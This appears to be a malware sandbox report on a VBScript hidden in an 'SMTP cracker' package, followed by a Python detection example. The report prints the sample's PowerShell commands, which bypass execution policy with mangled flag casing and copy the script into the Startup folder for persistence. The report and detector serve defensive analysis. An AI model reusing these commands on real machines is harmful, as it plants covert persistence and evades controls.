Analysis
-
max time kernel
66s -
max time network
83s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
submitted
17-03-2023 16:40
Behavioral task
behavioral1
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/1-FR4UDS-SMTP-CRACKER.exe
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/2-FR4UDS-SMTP-CHECKER.exe
Resource
win10-20230220-en
Behavioral task
behavioral3
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/__pycache__/FR4UDS.cpython-39.pyc
Resource
win10-20230220-en
Behavioral task
behavioral4
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/installation.bat
Resource
win10-20230220-en
Behavioral task
behavioral5
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/various/smtp.vbs
Resource
win10-20230220-en
General
-
Target
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/various/smtp.vbs
-
Size
62KB
-
MD5
ad077b50e620fc0b715f423aef6a51ae
-
SHA1
05a7a3ab1788598673679b94c7ade8c7bb4d05ae
-
SHA256
b4f286bc808ca2099328f599d503550f8cfd283162a55e6f106664baf5bc6f06
-
SHA512
a0c17fbdd58949886673d1f5ca31ad049c4ec5911610f039176fa349aba317f12e073f24a478aff811bdc1772e9ce4b198a96eb935760a5a357654dd5754e24d
-
SSDEEP
1536:oyt+ecUFsGGHKr8UOpk4tatxwf86qYGYNm:oy8lUiY1lCGom
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but it is a generic heuristic: nothing in this trace shows file encryption. The concrete behaviour recorded below is persistence (the script copies itself into the user's Startup folder under the system-tool-like name IPCONFIG.VBS) followed by a second, base64-encoded PowerShell stage.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pid   process
4580  powershell.exe
4376  powershell.exe
4376  powershell.exe
4580  powershell.exe
4376  powershell.exe
4580  powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  4580  powershell.exe
Token: SeDebugPrivilege  4376  powershell.exe
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
description                        pid   process      target process
PID 4344 wrote to memory of 4580   4344  WScript.exe  powershell.exe
PID 4344 wrote to memory of 4580   4344  WScript.exe  powershell.exe
PID 4344 wrote to memory of 4376   4344  WScript.exe  powershell.exe
PID 4344 wrote to memory of 4376   4344  WScript.exe  powershell.exe
Processes
-
- C:\Windows\System32\WScript.exe (depth 1)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IPCONFIG.VBS';
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO -enc 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
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
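The process tree above is the part of this report a detection engineer would act on: a script host (WScript.exe) spawning powershell.exe with a case-mangled `-ExecutionPolicy Bypass`, one child copying the script into the Startup folder, the other running an `-enc` payload. The following Python is an added example, not part of the sandbox report or of the sample's own code. It replays the three process records as constructed log entries and scores each one against those behaviours, decoding the encoded command the way PowerShell does (base64 over UTF-16LE). The real `-enc` payload is not reproduced on this page, so a harmless constructed base64 string stands in for it; the pid-to-command-line assignment (4580 for the Copy-Item instance, matching the order of the WriteProcessMemory events) and the rule names are this example's own assumptions.

```python
"""Score a process tree for the WScript -> powershell persistence chain seen in the report."""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed stand-in for the -enc payload (not the one from the sample):
# -EncodedCommand takes base64 of the UTF-16LE bytes of the script text.
SAMPLE_ENC = base64.b64encode("Write-Host 'placeholder'".encode("utf-16-le")).decode("ascii")

WSCRIPT = r"C:\Windows\System32\WScript.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
VBS = r"C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs"
STARTUP = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IPCONFIG.VBS"

# Constructed records (pid, parent pid, image, command line) built from the report's
# process tree. Assumption: pid 4580 is the Copy-Item child and 4376 the -enc child.
SAMPLE_PROCESSES: List[Tuple[int, int, str, str]] = [
    (4344, 0, WSCRIPT, f'"{WSCRIPT}" "{VBS}"'),
    (4580, 4344, PS,
     f"\"{PS}\" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO Copy-Item '{VBS}' '{STARTUP}';"),
    (4376, 4344, PS,
     f"\"{PS}\" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO -enc {SAMPLE_ENC}"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts unambiguous prefixes of its switches, so match -ex..., -ep... followed by bypass.
EXEC_BYPASS = re.compile(r"(?<!\S)-e(?:x[a-z]*|p[a-z]*)\s+bypass", re.I)
# -e, -ec, -enc, -encodedcommand ... followed by a base64 blob.
ENCODED = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
FLAG = re.compile(r"(?<!\S)-[A-Za-z]+")


def is_case_mangled(flag: str) -> bool:
    """Heuristic: -nOpROFILE style casing, which defeats naive case-sensitive matching.
    PascalCase (-NoProfile), all-lower and all-upper spellings are treated as normal."""
    letters = flag.lstrip("-")
    if not letters or letters.islower() or letters.isupper():
        return False
    if letters[0].islower():  # lowercase first letter but uppercase later on
        return True
    return re.search(r"[a-z][A-Z]{2}", letters) is not None


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand argument: base64 -> UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


@dataclass
class Finding:
    pid: int
    rules: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def analyse(processes: List[Tuple[int, int, str, str]]) -> Dict[int, Finding]:
    """Return one Finding per powershell.exe record that trips at least one rule."""
    by_pid = {p[0]: p for p in processes}
    findings: Dict[int, Finding] = {}
    for pid, ppid, image, cmd in processes:
        if image.rsplit("\\", 1)[-1].lower() != "powershell.exe":
            continue
        rules: List[str] = []
        decoded = None
        parent = by_pid.get(ppid)
        if parent and parent[2].rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            rules.append("script_host_spawns_powershell")
        if EXEC_BYPASS.search(cmd):
            rules.append("execution_policy_bypass")
        if STARTUP_DIR.search(cmd):
            rules.append("write_to_startup_folder")
        if any(is_case_mangled(f) for f in FLAG.findall(cmd)):
            rules.append("case_mangled_flags")
        m = ENCODED.search(cmd)
        if m:
            rules.append("encoded_command")
            try:
                decoded = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                decoded = None  # not valid base64/UTF-16LE; still worth the alert
        if rules:
            findings[pid] = Finding(pid, rules, decoded)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_PROCESSES).values():
        print(f.pid, ", ".join(f.rules), repr(f.decoded) if f.decoded else "")
```

The same rules apply unchanged to Sysmon event 1 or EDR process-creation telemetry: the parent/child relationship replaces the sandbox's WriteProcessMemory evidence, and the decoded `-enc` text is what you would pivot on next.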
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 f6c90ab0db80c6c3ea92556fda7273c7
SHA1 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256 a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512 aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 64B
MD5 dec0f16acbaf53509efe1a49b14a85d1
SHA1 e9d72e4240f93cb51dbaf66cb2995e33d8f41b5b
SHA256 c7d07d3e40a966a808eb6ab4fcf90d87051798d4172c02c21a5a9695fd4bafc8
SHA512 71eda9a5522cfa2b658cb2bd5e6ea2625bffae1dda4ded6e2df047155f956565e111f55a9fb98c3a89c73605eaf4ae3269398c33243272a1c6a42a24db618e17
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv2eyrmp.wvx.ps1
Filesize 1B
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/4376-131-0x000001C9F88C0000-0x000001C9F8936000-memory.dmp
Filesize 472KB
-
memory/4376-167-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmp
Filesize 64KB
-
memory/4376-168-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmp
Filesize 64KB
-
memory/4580-127-0x000002AE92EB0000-0x000002AE92ED2000-memory.dmp
Filesize 136KB
-
memory/4580-165-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp
Filesize 64KB
-
memory/4580-166-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp
Filesize 64KB
-
memory/4580-169-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp
Filesize 64KB